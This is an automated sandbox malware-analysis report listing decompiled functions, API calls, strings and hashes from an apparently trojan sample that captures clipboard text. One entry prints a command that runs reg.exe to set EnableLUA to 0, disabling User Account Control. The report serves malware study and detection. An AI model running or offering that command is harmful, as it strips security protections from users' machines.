                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Service$CloseHandle$Open$ControlManager
                                        • String ID:
                                        • API String ID: 221034970-0
                                        • Opcode ID: e0442b8656df40b354effc29a53afdc585f42babe91f9aeac9dec78915b16ffb
                                        • Instruction ID: 508c6a04514e5737773cd2f196b8466aacbf0489f3ca208dfe1df169d6e4b917
                                        • Opcode Fuzzy Hash: e0442b8656df40b354effc29a53afdc585f42babe91f9aeac9dec78915b16ffb
                                        • Instruction Fuzzy Hash: 93F0F6325403147BD3116B25EC89EFF3BACDB85BA1F000036F941921D2DB68CD4685F5
                                        Function 00419D32 Relevance: 9.0, APIs: 6, Instructions: 44serviceCOMMON
                                        Download Yara Rule
                                        APIs
                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D41
                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D55
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D62
                                        • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D71
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D83
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D86
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Service$CloseHandle$Open$ControlManager
                                        • String ID:
                                        • API String ID: 221034970-0
                                        • Opcode ID: 197637b26bbdd00f03ff7db36be43807083bab4a770c68d4e23c4aa016e90e1f
                                        • Instruction ID: e3947c2d1caeee04707242a29777fdfa1156a9fa4bc9e6dc5536219c00a7af20
                                        • Opcode Fuzzy Hash: 197637b26bbdd00f03ff7db36be43807083bab4a770c68d4e23c4aa016e90e1f
                                        • Instruction Fuzzy Hash: 88F0C2325002146BD2116B25FC49EBF3AACDB85BA1B00003AFA06A21D2DB38CD4685F9
                                        Function 00419D97 Relevance: 9.0, APIs: 6, Instructions: 44serviceCOMMON
                                        Download Yara Rule
                                        APIs
                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DA6
                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DBA
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DC7
                                        • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DD6
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DE8
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DEB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Service$CloseHandle$Open$ControlManager
                                        • String ID:
                                        • API String ID: 221034970-0
                                        • Opcode ID: e355818817006b765bc9d302ee5cf97eebc986756fff16413e45bff3808d062c
                                        • Instruction ID: 9f0c2abda8e07195e4bf0f321f31a82c7612ecaf5c8047990b3e76cea93c5393
                                        • Opcode Fuzzy Hash: e355818817006b765bc9d302ee5cf97eebc986756fff16413e45bff3808d062c
                                        • Instruction Fuzzy Hash: FAF0C2325002146BD2116B24FC89EFF3AACDB85BA1B00003AFA05A21D2DB28CE4685F8
                                        Function 004129AA Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 173registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                        • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,00002710,?,?,?,00000000,?,?,?,?), ref: 00412AED
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Enum$InfoQueryValue
                                        • String ID: [regsplt]$DG
                                        • API String ID: 3554306468-1089238109
                                        • Opcode ID: bdfd4bea99a2a56e0bf69a035c0c9d08caa5f3d1df37628ba4533c7e0d6d2cae
                                        • Instruction ID: a28855c8467dc88eaaa14c2ad720c73ed52e1c745f0e0c0b8cf84a63aeea62c1
                                        • Opcode Fuzzy Hash: bdfd4bea99a2a56e0bf69a035c0c9d08caa5f3d1df37628ba4533c7e0d6d2cae
                                        • Instruction Fuzzy Hash: 99512E72108345AFD310EF61D995DEBB7ECEF84744F00493EB585D2191EB74EA088B6A
                                        Function 004426E4 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 116COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe,00000104), ref: 00442724
                                        • _free.LIBCMT ref: 004427EF
                                        • _free.LIBCMT ref: 004427F9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free$FileModuleName
                                        • String ID: 8({$C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe
                                        • API String ID: 2506810119-299268273
                                        • Opcode ID: 517ef8501d39ed80bd5d3989cd54e6cd38b7eb486680de81052e85c6479d25b4
                                        • Instruction ID: a09326ba0634f9fc59332e3a0850bb80beab61cea56b0999b5ec2e0ea5ed553b
                                        • Opcode Fuzzy Hash: 517ef8501d39ed80bd5d3989cd54e6cd38b7eb486680de81052e85c6479d25b4
                                        • Instruction Fuzzy Hash: 04318075A00218AFEB21DF999D8199EBBFCEB85354B50406BF80497311D6B88E81CB59
                                        Function 0040AE58 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 87COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00433529: EnterCriticalSection.KERNEL32(00470D18,?,00475D4C,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433534
                                          • Part of subcall function 00433529: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433571
                                          • Part of subcall function 004338B5: __onexit.LIBCMT ref: 004338BB
                                        • __Init_thread_footer.LIBCMT ref: 0040AEA7
                                          • Part of subcall function 004334DF: EnterCriticalSection.KERNEL32(00470D18,00475D4C,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 004334E9
                                          • Part of subcall function 004334DF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 0043351C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit
                                        • String ID: [End of clipboard]$[Text copied to clipboard]$L]G$P]G
                                        • API String ID: 2974294136-4018440003
                                        • Opcode ID: b82003dba18b260b6b367d1d56eee30e8a04c9e681fd49378d646ec93357fd77
                                        • Instruction ID: f936e1d100a0b91fb3cd099947d4fcefdabc4258effb679c9043d151633dcd27
                                        • Opcode Fuzzy Hash: b82003dba18b260b6b367d1d56eee30e8a04c9e681fd49378d646ec93357fd77
                                        • Instruction Fuzzy Hash: EF21B131A002158ACB14FB75D8969EE7374AF54318F50403FF902771E2EF386E5A8A8D
                                        Function 0041CA2F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegisterClassExA.USER32(00000030), ref: 0041CA7C
                                        • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA97
                                        • GetLastError.KERNEL32 ref: 0041CAA1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ClassCreateErrorLastRegisterWindow
                                        • String ID: 0$MsgWindowClass
                                        • API String ID: 2877667751-2410386613
                                        • Opcode ID: c0911dd88a02fcfaa539e9866612e91b1c0db8d522a7ddfb79423dd2815842ef
                                        • Instruction ID: 4bfad48e3247df46523b3088673b608286a28c5fe91561ad906263ccd1e0ab35
                                        • Opcode Fuzzy Hash: c0911dd88a02fcfaa539e9866612e91b1c0db8d522a7ddfb79423dd2815842ef
                                        • Instruction Fuzzy Hash: 7501E5B1D1421DAB8B01DFEADCC49EFBBBDBE49295B50452AE415B2200E7708A458BA4
                                        Function 004069BA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42processCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00406A00
                                        • CloseHandle.KERNEL32(?), ref: 00406A0F
                                        • CloseHandle.KERNEL32(?), ref: 00406A14
                                        Strings
                                        • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004069F6
                                        • C:\Windows\System32\cmd.exe, xrefs: 004069FB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseHandle$CreateProcess
                                        • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                        • API String ID: 2922976086-4183131282
                                        • Opcode ID: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                        • Instruction ID: df89934bb1b0a8a8050eda01f74e4a29103dee5852f25f58c468be6e25eb4aa4
                                        • Opcode Fuzzy Hash: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                        • Instruction Fuzzy Hash: 22F090B69402ADBACB30ABD69C0EFCF7F3CEBC5B10F00042AB605A6051D6705144CAB8
                                        Function 004425E9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044259A,?,?,0044253A,?,0046DAE0,0000000C,00442691,?,00000002), ref: 00442609
                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044261C
                                        • FreeLibrary.KERNEL32(00000000,?,?,?,0044259A,?,?,0044253A,?,0046DAE0,0000000C,00442691,?,00000002,00000000), ref: 0044263F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressFreeHandleLibraryModuleProc
                                        • String ID: CorExitProcess$mscoree.dll
                                        • API String ID: 4061214504-1276376045
                                        • Opcode ID: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                        • Instruction ID: e7b95c4573467c94f6f12cd45ce5b447d53bb0dab0bc43500ba4ddd7032d9ec5
                                        • Opcode Fuzzy Hash: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                        • Instruction Fuzzy Hash: 99F04430A04209FBDB119F95ED09B9EBFB5EB08756F4140B9F805A2251DF749D41CA9C
                                        Function 00412774 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegCreateKeyW.ADVAPI32(80000001,00000000,BG), ref: 0041277F
                                        • RegSetValueExW.ADVAPI32(BG,?,00000000,00000001,00000000,00000000,004742F8,?,0040E5CB,pth_unenc,004742E0), ref: 004127AD
                                        • RegCloseKey.ADVAPI32(?,?,0040E5CB,pth_unenc,004742E0), ref: 004127B8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseCreateValue
                                        • String ID: pth_unenc$BG
                                        • API String ID: 1818849710-2233081382
                                        • Opcode ID: 2b0b83c385fe9b11323970af50dff3bb0d924dce91bf1d9d78cbef32cf6cf5ea
                                        • Instruction ID: fff2d7bcc465bc574364a4979b4b77ba115ffea085319746951fe37a0eeb78e5
                                        • Opcode Fuzzy Hash: 2b0b83c385fe9b11323970af50dff3bb0d924dce91bf1d9d78cbef32cf6cf5ea
                                        • Instruction Fuzzy Hash: 9FF0CD31500218BBDF109FA0ED46EEF37ACAB40B50F104539F902A60A1E675DB14DAA4
                                        Function 00404AB1 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,004745A8,00414DB5,00000000,00000000,00000001), ref: 00404AED
                                        • SetEvent.KERNEL32(00000304), ref: 00404AF9
                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00404B04
                                        • CloseHandle.KERNEL32(00000000), ref: 00404B0D
                                          • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                        • String ID: KeepAlive | Disabled
                                        • API String ID: 2993684571-305739064
                                        • Opcode ID: 706b613343be8dae912c097df07bb168f2a932249c2424fe80eb320cd199b408
                                        • Instruction ID: 6d19fc1829a92c7d53a4a1495ceb054f41c43dbe57a1f104861afa743dff4d10
                                        • Opcode Fuzzy Hash: 706b613343be8dae912c097df07bb168f2a932249c2424fe80eb320cd199b408
                                        • Instruction Fuzzy Hash: CDF0BBB19043007FDB1137759D0E66B7F58AB46325F00457FF892926F1DA38D890C75A
                                        Function 0041BE7F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041BF12), ref: 0041BE89
                                        • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF12), ref: 0041BE96
                                        • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041BF12), ref: 0041BEA3
                                        • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF12), ref: 0041BEB6
                                        Strings
                                        • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041BEA9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Console$AttributeText$BufferHandleInfoScreen
                                        • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                        • API String ID: 3024135584-2418719853
                                        • Opcode ID: b49fb2298264b14de8b5a7e9b756d7938e22e1a5816d236ca91e9d4b7b0725d3
                                        • Instruction ID: 2ebb83c1e7e70c4501562f07591cf8b091918c9767bda4cb27a2f29097fd03e7
                                        • Opcode Fuzzy Hash: b49fb2298264b14de8b5a7e9b756d7938e22e1a5816d236ca91e9d4b7b0725d3
                                        • Instruction Fuzzy Hash: C7E04F62104348ABD31437F5BC8ECAB3B7CE784613B100536F612903D3EA7484448A79
                                        Function 0044017A Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5145828a6066f50cf31ff859ee0e23af4d85e603a01b225214a849b1d7000abc
                                        • Instruction ID: 7508e0c950cfb5c07cf094bbf9e96825b82cecf32722f8b1b9d99ff1c2b3a0ae
                                        • Opcode Fuzzy Hash: 5145828a6066f50cf31ff859ee0e23af4d85e603a01b225214a849b1d7000abc
                                        • Instruction Fuzzy Hash: 0171C5319043169BEB21CF55C884ABFBB75FF51360F14426BEE50A7281C7B89C61CBA9
                                        Function 00410B19 Relevance: 7.7, APIs: 5, Instructions: 198memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004105B9: SetLastError.KERNEL32(0000000D,00410B38,?,00000000), ref: 004105BF
                                        • GetNativeSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410BC4
                                        • GetProcessHeap.KERNEL32(00000008,00000040,?,?,00000000), ref: 00410C2A
                                        • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410C31
                                        • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00410D3F
                                        • SetLastError.KERNEL32(000000C1,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410D69
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLast$Heap$AllocInfoNativeProcessSystem
                                        • String ID:
                                        • API String ID: 3525466593-0
                                        • Opcode ID: d29f1b7113f080e4870f36b8e837f1b4da9fc16b6a23fadf89bc0212f3888b6d
                                        • Instruction ID: 8d6069787765cd8089b920b9a1774e70d04059e2b0db351aafb66b48fc3d0dee
                                        • Opcode Fuzzy Hash: d29f1b7113f080e4870f36b8e837f1b4da9fc16b6a23fadf89bc0212f3888b6d
                                        • Instruction Fuzzy Hash: 3161C370200301ABD720DF66C981BA77BA6BF44744F04411AF9058B786EBF8E8C5CB99
                                        Function 004430A8 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
